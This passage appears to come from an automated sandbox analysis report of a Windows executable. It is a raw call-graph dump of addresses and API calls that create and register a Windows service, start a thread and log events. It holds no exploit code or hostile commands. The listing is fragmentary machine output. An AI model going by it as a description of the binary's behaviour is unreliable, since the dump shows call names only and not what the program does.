std::_Facet_Register 30 API calls 19951->19955 19952->19950 20038 7ff76e19084c 19952->20038 19954->19820 19955->19954 19957 7ff76e18cb11 19957->19954 19958 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19957->19958 19958->19950 19960 7ff76e183311 19959->19960 19963 7ff76e18322f 19959->19963 19961 7ff76e18ca60 30 API calls 19960->19961 19962 7ff76e1833f4 19961->19962 20086 7ff76e181300 19962->20086 19968 7ff76e18df40 30 API calls 19963->19968 19966 7ff76e183434 19970 7ff76e18df40 30 API calls 19966->19970 19967 7ff76e1835b1 CreateServiceW 19972 7ff76e18371c 19967->19972 19973 7ff76e183618 19967->19973 19969 7ff76e1832a8 __vcrt_getptd_noinit 19968->19969 19971 7ff76e181250 46 API calls 19969->19971 19974 7ff76e183548 __vcrt_getptd_noinit 19970->19974 19975 7ff76e1832ce 19971->19975 19972->19972 20090 7ff76e18df40 19972->20090 19973->19973 19978 7ff76e18df40 30 API calls 19973->19978 19979 7ff76e181250 46 API calls 19974->19979 19976 7ff76e18330c 19975->19976 19983 7ff76e18386d 19975->19983 19980 7ff76e190580 _log10_special 4 API calls 19976->19980 19982 7ff76e1836a9 __vcrt_getptd_noinit 19978->19982 19992 7ff76e18356e 19979->19992 19984 7ff76e18384b 19980->19984 19981 7ff76e183798 20104 7ff76e181250 19981->20104 19989 7ff76e181250 46 API calls 19982->19989 19987 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19983->19987 19984->19844 19986 7ff76e1837b2 19988 7ff76e1837ed CloseServiceHandle CloseServiceHandle 19986->19988 19993 7ff76e18387f 19986->19993 19990 7ff76e183873 19987->19990 19988->19992 19991 7ff76e1836cf CloseServiceHandle 19989->19991 19994 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19990->19994 19991->19992 19992->19976 19992->19990 19995 7ff76e183868 19992->19995 19996 7ff76e183879 19992->19996 19997 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19993->19997 19994->19996 19998 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19995->19998 20000 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19996->20000 19999 7ff76e183885 RegisterServiceCtrlHandlerW 19997->19999 19998->19983 20001 7ff76e183b38 SetServiceStatus CreateEventW 19999->20001 20002 7ff76e1838d3 19999->20002 20000->19993 20003 7ff76e183ba8 SetServiceStatus CreateThread 20001->20003 20004 7ff76e183c01 __vcrt_getptd_noinit 20001->20004 20005 7ff76e18ca60 30 API calls 20002->20005 20003->20004 20012 7ff76e183b2e 20003->20012 20006 7ff76e183c07 SetServiceStatus 20004->20006 20008 7ff76e183adc 20005->20008 20006->20012 20007 7ff76e190580 _log10_special 4 API calls 20009 7ff76e183c50 20007->20009 20010 7ff76e183d40 33 API calls 20008->20010 20009->19844 20011 7ff76e183aef 20010->20011 20011->20012 20013 7ff76e183c59 20011->20013 20012->20007 20014 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20013->20014 20015 7ff76e183c5e 20014->20015 20016 7ff76e183c6d SetServiceStatus SetEvent 20015->20016 20017 7ff76e183d36 20015->20017 20018 7ff76e183cdb SetServiceStatus 20016->20018 20017->19844 20018->20017 20021 7ff76e18e4ef 20020->20021 20022 7ff76e181580 30 API calls 20021->20022 20023 7ff76e18e4f4 20022->20023 20025 7ff76e18e51b 20023->20025 20422 7ff76e18eae0 20023->20422 20025->19829 20027 7ff76e183d79 __vcrt_getptd_noinit 20026->20027 20028 7ff76e183df3 20026->20028 20547 7ff76e1812b0 20027->20547 20029 7ff76e190580 _log10_special 4 API calls 20028->20029 20030 7ff76e183e03 20029->20030 20030->19844 20034 7ff76e19c25c _invalid_parameter_noinfo_noreturn 28 API calls 20033->20034 20035 7ff76e19c3fd 20034->20035 20036 7ff76e19c414 _invalid_parameter_noinfo_noreturn 11 API calls 20035->20036 20037 7ff76e19c412 20036->20037 20041 7ff76e190857 std::_Facet_Register 20038->20041 20039 7ff76e190870 20039->19957 20040 7ff76e190881 20042 7ff76e1814e0 Concurrency::cancel_current_task 30 API calls 20040->20042 20041->20039 20041->20040 20056 7ff76e1911b4 20041->20056 20044 7ff76e190887 20042->20044 20044->19957 20046 7ff76e1814ee Concurrency::cancel_current_task 20045->20046 20047 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20046->20047 20048 7ff76e1814ff 20047->20048 20065 7ff76e19224c 20048->20065 20050 7ff76e181529 20050->19946 20078 7ff76e18f688 20051->20078 20057 7ff76e1911c2 std::bad_alloc::bad_alloc 20056->20057 20060 7ff76e192494 20057->20060 20059 7ff76e1911d3 20061 7ff76e1924b3 20060->20061 20062 7ff76e1924dc RtlPcToFileHeader 20061->20062 20063 7ff76e1924fe RaiseException 20061->20063 20064 7ff76e1924f4 20062->20064 20063->20059 20064->20063 20066 7ff76e1922a2 _Yarn 20065->20066 20067 7ff76e19226d 20065->20067 20066->20050 20067->20066 20069 7ff76e1a0ea4 20067->20069 20070 7ff76e1a0eb1 20069->20070 20071 7ff76e1a0ebb 20069->20071 20070->20071 20076 7ff76e1a0ed6 20070->20076 20072 7ff76e19d35c _set_fmode 6 API calls 20071->20072 20073 7ff76e1a0ec2 20072->20073 20074 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 20073->20074 20075 7ff76e1a0ece 20074->20075 20075->20066 20076->20075 20077 7ff76e19d35c _set_fmode 6 API calls 20076->20077 20077->20073 20083 7ff76e18f538 20078->20083 20081 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20082 7ff76e18f6aa 20081->20082 20084 7ff76e19224c __std_exception_copy 28 API calls 20083->20084 20085 7ff76e18f56c 20084->20085 20085->20081 20087 7ff76e181331 20086->20087 20088 7ff76e18131d OpenSCManagerW 20086->20088 20108 7ff76e181350 20087->20108 20088->19966 20088->19967 20091 7ff76e18e034 20090->20091 20094 7ff76e18df66 20090->20094 20092 7ff76e181580 30 API calls 20091->20092 20093 7ff76e18e03a 20092->20093 20096 7ff76e18df6c ctype 20094->20096 20097 7ff76e18dff5 20094->20097 20098 7ff76e18df9c 20094->20098 20095 7ff76e19084c std::_Facet_Register 30 API calls 20099 7ff76e18dfb2 20095->20099 20096->19981 20101 7ff76e19084c std::_Facet_Register 30 API calls 20097->20101 20098->20095 20100 7ff76e18e02e 20098->20100 20099->20096 20103 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20099->20103 20102 7ff76e1814e0 Concurrency::cancel_current_task 30 API calls 20100->20102 20101->20096 20102->20091 20103->20100 20105 7ff76e18127d 20104->20105 20403 7ff76e19ac28 20105->20403 20109 7ff76e181375 20108->20109 20112 7ff76e19ad4c 20109->20112 20114 7ff76e19ada6 20112->20114 20113 7ff76e19adcb 20116 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20113->20116 20114->20113 20115 7ff76e19ae07 20114->20115 20134 7ff76e199134 20115->20134 20119 7ff76e19adf5 20116->20119 20118 7ff76e19af69 20121 7ff76e19af7f 20118->20121 20123 7ff76e196190 ProcessCodePage 28 API calls 20118->20123 20119->20118 20120 7ff76e196190 ProcessCodePage 28 API calls 20119->20120 20120->20118 20124 7ff76e190580 _log10_special 4 API calls 20121->20124 20122 7ff76e19aee8 20125 7ff76e1a2448 __free_lconv_mon 6 API calls 20122->20125 20123->20121 20127 7ff76e181399 20124->20127 20125->20119 20127->20088 20128 7ff76e19af0e 20128->20122 20131 7ff76e19af18 20128->20131 20129 7ff76e19aebd 20132 7ff76e1a2448 __free_lconv_mon 6 API calls 20129->20132 20130 7ff76e19aeb4 20130->20122 20130->20129 20133 7ff76e1a2448 __free_lconv_mon 6 API calls 20131->20133 20132->20119 20133->20119 20135 7ff76e199172 20134->20135 20136 7ff76e199162 20134->20136 20137 7ff76e1991a9 20135->20137 20138 7ff76e19917b 20135->20138 20140 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20136->20140 20137->20136 20139 7ff76e1991a1 20137->20139 20145 7ff76e199b7c 20137->20145 20178 7ff76e199594 20137->20178 20215 7ff76e198d0c 20137->20215 20141 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20138->20141 20139->20122 20139->20128 20139->20129 20139->20130 20140->20139 20141->20139 20146 7ff76e199c2f 20145->20146 20147 7ff76e199bbe 20145->20147 20150 7ff76e199c34 20146->20150 20151 7ff76e199c88 20146->20151 20148 7ff76e199bc4 20147->20148 20149 7ff76e199c59 20147->20149 20152 7ff76e199bf8 20148->20152 20153 7ff76e199bc9 20148->20153 20238 7ff76e197dc4 20149->20238 20154 7ff76e199c36 20150->20154 20155 7ff76e199c69 20150->20155 20157 7ff76e199c9f 20151->20157 20158 7ff76e199c92 20151->20158 20162 7ff76e199c97 20151->20162 20160 7ff76e199bcf 20152->20160 20152->20162 20153->20157 20153->20160 20156 7ff76e199bd8 20154->20156 20165 7ff76e199c45 20154->20165 20245 7ff76e1979b4 20155->20245 20177 7ff76e199cc8 20156->20177 20218 7ff76e19a330 20156->20218 20252 7ff76e19a884 20157->20252 20158->20149 20158->20162 20160->20156 20166 7ff76e199c0a 20160->20166 20175 7ff76e199bf3 20160->20175 20162->20177 20256 7ff76e1981d4 20162->20256 20165->20149 20168 7ff76e199c4a 20165->20168 20166->20177 20228 7ff76e19a66c 20166->20228 20168->20177 20234 7ff76e19a730 20168->20234 20170 7ff76e190580 _log10_special 4 API calls 20172 7ff76e199fc2 20170->20172 20172->20137 20176 7ff76e199eb4 20175->20176 20175->20177 20263 7ff76e19a9a0 20175->20263 20176->20177 20270 7ff76e1a5424 20176->20270 20177->20170 20179 7ff76e1995a2 20178->20179 20180 7ff76e1995b8 20178->20180 20181 7ff76e1995f8 20179->20181 20182 7ff76e199c2f 20179->20182 20183 7ff76e199bbe 20179->20183 20180->20181 20184 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20180->20184 20181->20137 20187 7ff76e199c34 20182->20187 20188 7ff76e199c88 20182->20188 20185 7ff76e199bc4 20183->20185 20186 7ff76e199c59 20183->20186 20184->20181 20189 7ff76e199bf8 20185->20189 20190 7ff76e199bc9 20185->20190 20194 7ff76e197dc4 29 API calls 20186->20194 20191 7ff76e199c36 20187->20191 20196 7ff76e199c69 20187->20196 20192 7ff76e199c9f 20188->20192 20193 7ff76e199c92 20188->20193 20198 7ff76e199c97 20188->20198 20195 7ff76e199bcf 20189->20195 20189->20198 20190->20192 20190->20195 20203 7ff76e199c45 20191->20203 20204 7ff76e199bd8 20191->20204 20199 7ff76e19a884 28 API calls 20192->20199 20193->20186 20193->20198 20212 7ff76e199bf3 20194->20212 20201 7ff76e199c0a 20195->20201 20195->20204 20195->20212 20200 7ff76e1979b4 29 API calls 20196->20200 20197 7ff76e19a330 29 API calls 20197->20212 20202 7ff76e1981d4 29 API calls 20198->20202 20214 7ff76e199cc8 20198->20214 20199->20212 20200->20212 20205 7ff76e19a66c 29 API calls 20201->20205 20201->20214 20202->20212 20203->20186 20206 7ff76e199c4a 20203->20206 20204->20197 20204->20214 20205->20212 20208 7ff76e19a730 28 API calls 20206->20208 20206->20214 20207 7ff76e190580 _log10_special 4 API calls 20209 7ff76e199fc2 20207->20209 20208->20212 20209->20137 20210 7ff76e19a9a0 ProcessCodePage 28 API calls 20213 7ff76e199eb4 20210->20213 20211 7ff76e1a5424 29 API calls 20211->20213 20212->20210 20212->20213 20212->20214 20213->20211 20213->20214 20214->20207 20386 7ff76e197038 20215->20386 20219 7ff76e19a356 20218->20219 20282 7ff76e196bf0 20219->20282 20224 7ff76e19a9a0 ProcessCodePage 28 API calls 20227 7ff76e19a49b 20224->20227 20225 7ff76e19a9a0 ProcessCodePage 28 API calls 20226 7ff76e19a529 20225->20226 20226->20175 20227->20225 20227->20226 20227->20227 20231 7ff76e19a6a1 20228->20231 20229 7ff76e19a6e6 20229->20175 20230 7ff76e19a6bf 20233 7ff76e1a5424 29 API calls 20230->20233 20231->20229 20231->20230 20232 7ff76e19a9a0 ProcessCodePage 28 API calls 20231->20232 20232->20230 20233->20229 20236 7ff76e19a751 20234->20236 20235 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20237 7ff76e19a782 20235->20237 20236->20235 20236->20237 20237->20175 20239 7ff76e197df7 20238->20239 20240 7ff76e197e26 20239->20240 20242 7ff76e197ee3 20239->20242 20244 7ff76e197e63 20240->20244 20345 7ff76e196c98 20240->20345 20243 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20242->20243 20243->20244 20244->20175 20246 7ff76e1979e7 20245->20246 20247 7ff76e197a16 20246->20247 20249 7ff76e197ad3 20246->20249 20248 7ff76e196c98 7 API calls 20247->20248 20251 7ff76e197a53 20247->20251 20248->20251 20250 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20249->20250 20250->20251 20251->20175 20253 7ff76e19a8c7 20252->20253 20255 7ff76e19a8cb __crtLCMapStringW 20253->20255 20353 7ff76e19a920 20253->20353 20255->20175 20257 7ff76e198207 20256->20257 20258 7ff76e198236 20257->20258 20260 7ff76e1982f3 20257->20260 20259 7ff76e196c98 7 API calls 20258->20259 20262 7ff76e198273 20258->20262 20259->20262 20261 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20260->20261 20261->20262 20262->20175 20264 7ff76e196190 ProcessCodePage 28 API calls 20263->20264 20265 7ff76e19a9b7 20264->20265 20357 7ff76e1a43d4 20265->20357 20272 7ff76e1a5455 20270->20272 20280 7ff76e1a5463 20270->20280 20271 7ff76e1a5483 20274 7ff76e1a5494 20271->20274 20275 7ff76e1a54bb 20271->20275 20272->20271 20273 7ff76e19a9a0 ProcessCodePage 28 API calls 20272->20273 20272->20280 20273->20271 20376 7ff76e1ae894 20274->20376 20277 7ff76e1a5546 20275->20277 20278 7ff76e1a54e5 20275->20278 20275->20280 20279 7ff76e1a9680 _fread_nolock MultiByteToWideChar 20277->20279 20278->20280 20379 7ff76e1a9680 20278->20379 20279->20280 20280->20176 20283 7ff76e196c16 20282->20283 20284 7ff76e196c27 20282->20284 20290 7ff76e1a4f8c 20283->20290 20284->20283 20285 7ff76e1a4340 _fread_nolock 7 API calls 20284->20285 20286 7ff76e196c54 20285->20286 20287 7ff76e196c68 20286->20287 20288 7ff76e1a2448 __free_lconv_mon 6 API calls 20286->20288 20289 7ff76e1a2448 __free_lconv_mon 6 API calls 20287->20289 20288->20287 20289->20283 20291 7ff76e1a4fa9 20290->20291 20292 7ff76e1a4fdc 20290->20292 20293 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20291->20293 20292->20291 20294 7ff76e1a500e 20292->20294 20306 7ff76e19a479 20293->20306 20295 7ff76e1a5056 20294->20295 20300 7ff76e1a5121 20294->20300 20295->20306 20308 7ff76e1a0ea4 __std_exception_copy 28 API calls 20295->20308 20296 7ff76e1a5213 20336 7ff76e1a4478 20296->20336 20298 7ff76e1a51d9 20329 7ff76e1a4810 20298->20329 20300->20296 20300->20298 20301 7ff76e1a51a8 20300->20301 20302 7ff76e1a516b 20300->20302 20304 7ff76e1a5161 20300->20304 20322 7ff76e1a4af0 20301->20322 20312 7ff76e1a4d20 20302->20312 20304->20298 20307 7ff76e1a5166 20304->20307 20306->20224 20306->20227 20307->20301 20307->20302 20309 7ff76e1a510e 20308->20309 20309->20306 20310 7ff76e19c414 _invalid_parameter_noinfo_noreturn 11 API calls 20309->20310 20311 7ff76e1a5270 20310->20311 20313 7ff76e1aec98 28 API calls 20312->20313 20314 7ff76e1a4d6d 20313->20314 20315 7ff76e1aeb88 28 API calls 20314->20315 20316 7ff76e1a4dc8 20315->20316 20317 7ff76e1a4e1d 20316->20317 20319 7ff76e1a4de8 20316->20319 20321 7ff76e1a4dcc 20316->20321 20318 7ff76e1a490c 28 API calls 20317->20318 20318->20321 20320 7ff76e1a4bc8 28 API calls 20319->20320 20320->20321 20321->20306 20323 7ff76e1aec98 28 API calls 20322->20323 20324 7ff76e1a4b3a 20323->20324 20325 7ff76e1aeb88 28 API calls 20324->20325 20326 7ff76e1a4b8a 20325->20326 20327 7ff76e1a4b8e 20326->20327 20328 7ff76e1a4bc8 28 API calls 20326->20328 20327->20306 20328->20327 20330 7ff76e1aec98 28 API calls 20329->20330 20331 7ff76e1a485b 20330->20331 20332 7ff76e1aeb88 28 API calls 20331->20332 20333 7ff76e1a48b3 20332->20333 20334 7ff76e1a48b7 20333->20334 20335 7ff76e1a490c 28 API calls 20333->20335 20334->20306 20335->20334 20337 7ff76e1a44f0 20336->20337 20338 7ff76e1a44bd 20336->20338 20340 7ff76e1a4508 20337->20340 20342 7ff76e1a4589 20337->20342 20339 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20338->20339 20344 7ff76e1a44e9 _fread_nolock 20339->20344 20341 7ff76e1a4810 28 API calls 20340->20341 20341->20344 20343 7ff76e19a9a0 ProcessCodePage 28 API calls 20342->20343 20342->20344 20343->20344 20344->20306 20346 7ff76e196cbe 20345->20346 20347 7ff76e196ccf 20345->20347 20346->20244 20347->20346 20348 7ff76e1a4340 _fread_nolock 7 API calls 20347->20348 20349 7ff76e196d00 20348->20349 20350 7ff76e196d14 20349->20350 20351 7ff76e1a2448 __free_lconv_mon 6 API calls 20349->20351 20352 7ff76e1a2448 __free_lconv_mon 6 API calls 20350->20352 20351->20350 20352->20346 20354 7ff76e19a946 20353->20354 20355 7ff76e19a93e 20353->20355 20354->20255 20356 7ff76e19a9a0 ProcessCodePage 28 API calls 20355->20356 20356->20354 20358 7ff76e19a9df 20357->20358 20359 7ff76e1a43ed 20357->20359 20361 7ff76e1a4440 20358->20361 20359->20358 20365 7ff76e1acf9c 20359->20365 20362 7ff76e19a9ef 20361->20362 20363 7ff76e1a4459 20361->20363 20362->20176 20363->20362 20373 7ff76e1aa970 20363->20373 20366 7ff76e1a1df0 _Getctype 28 API calls 20365->20366 20368 7ff76e1acfab 20366->20368 20367 7ff76e1acff6 20367->20358 20368->20367 20369 7ff76e1ad00c _Getctype 6 API calls 20368->20369 20370 7ff76e1acfe4 20369->20370 20370->20367 20371 7ff76e19d230 BuildCatchObjectHelperInternal 28 API calls 20370->20371 20372 7ff76e1ad009 20371->20372 20374 7ff76e1a1df0 _Getctype 28 API calls 20373->20374 20375 7ff76e1aa979 20374->20375 20382 7ff76e1b272c 20376->20382 20380 7ff76e1a9689 MultiByteToWideChar 20379->20380 20384 7ff76e1b2790 std::_Locinfo::_Locinfo_ctor 20382->20384 20383 7ff76e190580 _log10_special IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 20385 7ff76e1ae8b1 20383->20385 20384->20383 20385->20280 20387 7ff76e19707f 20386->20387 20388 7ff76e19706d 20386->20388 20391 7ff76e19708d 20387->20391 20395 7ff76e1970c9 20387->20395 20389 7ff76e19d35c _set_fmode 6 API calls 20388->20389 20390 7ff76e197072 20389->20390 20392 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 20390->20392 20393 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20391->20393 20400 7ff76e19707d 20392->20400 20393->20400 20394 7ff76e197445 20396 7ff76e19d35c _set_fmode 6 API calls 20394->20396 20394->20400 20395->20394 20397 7ff76e19d35c _set_fmode 6 API calls 20395->20397 20398 7ff76e1976d9 20396->20398 20399 7ff76e19743a 20397->20399 20401 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 20398->20401 20402 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 20399->20402 20400->20137 20401->20400 20402->20394 20404 7ff76e19ac52 20403->20404 20405 7ff76e19ac8a 20404->20405 20407 7ff76e19acbd 20404->20407 20406 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20405->20406 20410 7ff76e19acb3 20406->20410 20414 7ff76e196bb0 20407->20414 20409 7ff76e19ad27 20411 7ff76e18129b 20409->20411 20413 7ff76e196190 ProcessCodePage 28 API calls 20409->20413 20410->20409 20412 7ff76e196190 ProcessCodePage 28 API calls 20410->20412 20411->19986 20412->20409 20413->20411 20421 7ff76e196494 RtlEnterCriticalSection 20414->20421 20416 7ff76e196bcd 20417 7ff76e198af4 44 API calls 20416->20417 20418 7ff76e196bd6 20417->20418 20419 7ff76e1964a0 _fread_nolock RtlLeaveCriticalSection 20418->20419 20420 7ff76e196be0 20419->20420 20420->20410 20423 7ff76e18eb30 20422->20423 20424 7ff76e18eaf7 20422->20424 20423->20025 20424->20423 20460 7ff76e181f30 20424->20460 20426 7ff76e18eb76 20427 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20426->20427 20431 7ff76e18eb87 20427->20431 20428 7ff76e18eccf 20429 7ff76e181580 30 API calls 20428->20429 20437 7ff76e18ecd5 20429->20437 20430 7ff76e18ecc9 20432 7ff76e1814e0 Concurrency::cancel_current_task 30 API calls 20430->20432 20431->20428 20431->20430 20433 7ff76e18ebbf ctype 20431->20433 20434 7ff76e18ec33 20431->20434 20435 7ff76e18ec87 20431->20435 20432->20428 20433->20025 20434->20430 20439 7ff76e19084c std::_Facet_Register 30 API calls 20434->20439 20436 7ff76e19084c std::_Facet_Register 30 API calls 20435->20436 20436->20433 20471 7ff76e18f310 20437->20471 20440 7ff76e18ec48 20439->20440 20440->20433 20442 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20440->20442 20441 7ff76e18eeb5 20441->20025 20442->20430 20443 7ff76e181f30 30 API calls 20446 7ff76e18ef35 20443->20446 20444 7ff76e18edb1 20444->20441 20444->20443 20445 7ff76e18ed4a 20445->20444 20481 7ff76e18e040 20445->20481 20448 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20446->20448 20449 7ff76e18ef46 20448->20449 20451 7ff76e18efd0 20449->20451 20485 7ff76e18e780 20449->20485 20452 7ff76e18f1c4 20451->20452 20453 7ff76e18f176 20451->20453 20456 7ff76e181f30 30 API calls 20452->20456 20454 7ff76e18f187 20453->20454 20455 7ff76e18eae0 30 API calls 20453->20455 20454->20025 20455->20454 20457 7ff76e18f208 20456->20457 20458 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20457->20458 20459 7ff76e18f219 20458->20459 20459->20025 20461 7ff76e181f60 20460->20461 20461->20461 20462 7ff76e18df40 30 API calls 20461->20462 20463 7ff76e181f74 20462->20463 20509 7ff76e181680 20463->20509 20465 7ff76e181fc2 20465->20426 20466 7ff76e181f8d 20466->20465 20467 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20466->20467 20468 7ff76e181fe4 20467->20468 20469 7ff76e19224c __std_exception_copy 28 API calls 20468->20469 20470 7ff76e18201d 20469->20470 20470->20426 20473 7ff76e18f350 20471->20473 20476 7ff76e18f32a 20471->20476 20472 7ff76e18f34a 20472->20445 20474 7ff76e18f35e 20473->20474 20475 7ff76e18e780 30 API calls 20473->20475 20474->20445 20475->20474 20476->20472 20477 7ff76e181f30 30 API calls 20476->20477 20478 7ff76e18f3b3 20477->20478 20479 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20478->20479 20480 7ff76e18f3c4 20479->20480 20482 7ff76e18e19d 20481->20482 20483 7ff76e181580 30 API calls 20482->20483 20484 7ff76e18e1a2 20483->20484 20486 7ff76e18e847 20485->20486 20487 7ff76e18e7be 20485->20487 20489 7ff76e190580 _log10_special 4 API calls 20486->20489 20543 7ff76e18e550 20487->20543 20490 7ff76e18e87c 20489->20490 20490->20451 20491 7ff76e18e7cb 20492 7ff76e18e834 20491->20492 20494 7ff76e18e891 20491->20494 20492->20486 20493 7ff76e18eae0 30 API calls 20492->20493 20493->20486 20495 7ff76e181f30 30 API calls 20494->20495 20496 7ff76e18e8d3 20495->20496 20497 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20496->20497 20499 7ff76e18e8e4 20497->20499 20498 7ff76e18e93d 20501 7ff76e18ea16 20498->20501 20503 7ff76e18ea52 20498->20503 20499->20498 20500 7ff76e18e780 30 API calls 20499->20500 20500->20498 20502 7ff76e18ea27 20501->20502 20504 7ff76e18eae0 30 API calls 20501->20504 20502->20451 20505 7ff76e181f30 30 API calls 20503->20505 20504->20502 20506 7ff76e18ea94 20505->20506 20507 7ff76e192494 Concurrency::cancel_current_task 2 API calls 20506->20507 20508 7ff76e18eaa5 20507->20508 20508->20451 20513 7ff76e1816cb 20509->20513 20510 7ff76e181923 20511 7ff76e181580 30 API calls 20510->20511 20512 7ff76e181929 20511->20512 20516 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20512->20516 20513->20510 20514 7ff76e181710 20513->20514 20519 7ff76e181775 20513->20519 20521 7ff76e1816eb ctype 20513->20521 20518 7ff76e19084c std::_Facet_Register 30 API calls 20514->20518 20522 7ff76e18191d 20514->20522 20515 7ff76e1817c4 20524 7ff76e18d580 30 API calls 20515->20524 20528 7ff76e18192f __std_exception_destroy 20516->20528 20518->20521 20520 7ff76e19084c std::_Facet_Register 30 API calls 20519->20520 20520->20521 20521->20515 20523 7ff76e181918 20521->20523 20534 7ff76e18d580 20521->20534 20525 7ff76e1814e0 Concurrency::cancel_current_task 30 API calls 20522->20525 20526 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 20523->20526 20527 7ff76e181808 20524->20527 20525->20510 20526->20522 20527->20512 20529 7ff76e19224c __std_exception_copy 28 API calls 20527->20529 20528->20466 20530 7ff76e1818a4 20529->20530 20530->20523 20531 7ff76e1818e0 20530->20531 20532 7ff76e190580 _log10_special 4 API calls 20531->20532 20533 7ff76e181906 20532->20533 20533->20466 20535 7ff76e18d5e2 20534->20535 20538 7ff76e18d5a3 ctype 20534->20538 20539 7ff76e18e1b0 20535->20539 20538->20515 20540 7ff76e18e338 20539->20540 20541 7ff76e181580 30 API calls 20540->20541 20542 7ff76e18e33d 20541->20542 20545 7ff76e18e579 20543->20545 20544 7ff76e18e595 20544->20491 20545->20544 20546 7ff76e18e780 30 API calls 20545->20546 20546->20544 20548 7ff76e1812de 20547->20548 20549 7ff76e1812ca ReportEventW DeregisterEventSource 20547->20549 20550 7ff76e181350 30 API calls 20548->20550 20549->20028 20550->20549 20552 7ff76e1a1df0 _Getctype 28 API calls 20551->20552 20553 7ff76e1a0e81 __crtLCMapStringW 20552->20553 20554 7ff76e19d230 BuildCatchObjectHelperInternal 28 API calls 20553->20554 20555 7ff76e1a0ea1 20554->20555 23750 7ff76e18aee0 23751 7ff76e18af09 23750->23751 23753 7ff76e18af10 23750->23753 23752 7ff76e190580 _log10_special 4 API calls 23751->23752 23754 7ff76e18b078 23752->23754 23753->23751 23755 7ff76e18af96 23753->23755 23757 7ff76e18b014 23753->23757 23755->23751 23759 7ff76e196210 23755->23759 23757->23751 23758 7ff76e19b460 46 API calls 23757->23758 23758->23751 23760 7ff76e196240 23759->23760 23767 7ff76e196028 23760->23767 23763 7ff76e196190 ProcessCodePage 28 API calls 23765 7ff76e19627e 23763->23765 23764 7ff76e196293 23764->23751 23765->23764 23766 7ff76e196190 ProcessCodePage 28 API calls 23765->23766 23766->23764 23768 7ff76e196083 23767->23768 23769 7ff76e19604e 23767->23769 23785 7ff76e196494 RtlEnterCriticalSection 23768->23785 23770 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 23769->23770 23772 7ff76e196070 23770->23772 23772->23763 23772->23765 20556 7ff76e19ebed 20557 7ff76e1a0e78 __GSHandlerCheck_EH 28 API calls 20556->20557 20558 7ff76e19ebf2 20557->20558 20559 7ff76e19ec63 20558->20559 20560 7ff76e19ec19 GetModuleHandleW 20558->20560 20568 7ff76e19eaf0 20559->20568 20560->20559 20566 7ff76e19ec26 20560->20566 20562 7ff76e19ec9f 20563 7ff76e19eca6 20562->20563 20572 7ff76e19ecbc 20562->20572 20566->20559 20579 7ff76e19ed14 GetModuleHandleExW 20566->20579 20569 7ff76e19eb0c 20568->20569 20581 7ff76e19eb28 20569->20581 20571 7ff76e19eb15 20571->20562 20596 7ff76e19ecf0 20572->20596 20574 7ff76e19ecc9 20575 7ff76e19ecde 20574->20575 20576 7ff76e19eccd GetCurrentProcess TerminateProcess 20574->20576 20577 7ff76e19ed14 GetModuleHandleExW 20575->20577 20576->20575 20578 7ff76e19ece5 ExitProcess 20577->20578 20580 7ff76e19ed48 __crtLCMapStringW __vcrt_InitializeCriticalSectionEx 20579->20580 20580->20559 20582 7ff76e19eb3e __crtLCMapStringW 20581->20582 20584 7ff76e19eba1 20581->20584 20582->20584 20585 7ff76e1a0c20 20582->20585 20584->20571 20588 7ff76e1a0904 20585->20588 20587 7ff76e1a0c5d 20587->20584 20589 7ff76e1a0920 20588->20589 20592 7ff76e1a0af0 20589->20592 20591 7ff76e1a0929 20591->20587 20593 7ff76e1a0b16 20592->20593 20594 7ff76e1a0b1e __crtLCMapStringW 20592->20594 20593->20591 20594->20593 20595 7ff76e1a2448 __free_lconv_mon 6 API calls 20594->20595 20595->20593 20599 7ff76e1ab6d0 20596->20599 20598 7ff76e19ecf9 20598->20574 20600 7ff76e1ab6e1 20599->20600 20601 7ff76e1ab6ef 20600->20601 20603 7ff76e1a2700 20600->20603 20604 7ff76e1a2544 __crtLCMapStringW 2 API calls 20603->20604 20605 7ff76e1a2728 20604->20605 20605->20601

                                                                                                      Executed Functions

                                                                                                      Function 00007FF76E1831E0 Relevance: 60.1, APIs: 24, Strings: 10, Instructions: 623serviceregistrythreadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
